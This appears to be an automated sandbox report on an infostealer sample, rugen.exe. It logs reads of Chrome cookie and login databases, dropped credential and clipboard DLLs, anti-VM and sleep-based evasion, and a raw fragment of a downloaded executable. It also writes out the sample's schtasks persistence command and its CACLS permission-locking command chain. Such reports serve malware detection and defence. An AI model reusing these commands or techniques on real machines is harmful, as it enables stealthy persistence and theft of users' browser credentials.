NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00afc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7357a000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02090000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02091000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02092000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02093000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

rugen.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (4 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW June 26, 2023, 9:52 a.m.	number_of_free_clusters: 2425143 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 26, 2023, 9:52 a.m.	number_of_free_clusters: 2425143 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 26, 2023, 9:52 a.m.	number_of_free_clusters: 2425026 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 26, 2023, 9:52 a.m.	number_of_free_clusters: 2425026 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y0759327.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\n0441467.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\l7175925.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\k0740620.exe

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y\|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\n0441467.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y0759327.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 26, 2023, 9:53 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe	1	1
ShellExecuteExW June 26, 2023, 9:53 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW June 26, 2023, 9:53 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y\|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW June 26, 2023, 9:54 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1

An executable file was downloaded by the process rugen.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile June 26, 2023, 9:54 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELOdà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0006c400', u'virtual_address': u'0x00011000', u'entropy': 7.775798956927822, u'name': u'.data', u'virtual_size': u'0x0006e02c'}

entropy

7.77579895693

description

A section with a high entropy has been found

entropy

0.875631951466

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 26, 2023, 9:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 26, 2023, 9:53 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: 7-Zip base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: AddressBook base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: Adobe AIR base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: Connection Manager base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: DirectDrawEx base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: EditPlus base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: Fontcore base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: Google Chrome base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: IE40 base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: IE4Data base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: IE5BAKEX base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: IEData base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: MobileOptionPack base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: Office15.PROPLUSR base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: SchedulingAgent base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: WIC base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW June 26, 2023, 9:53 a.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x000003dc key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (2 events)

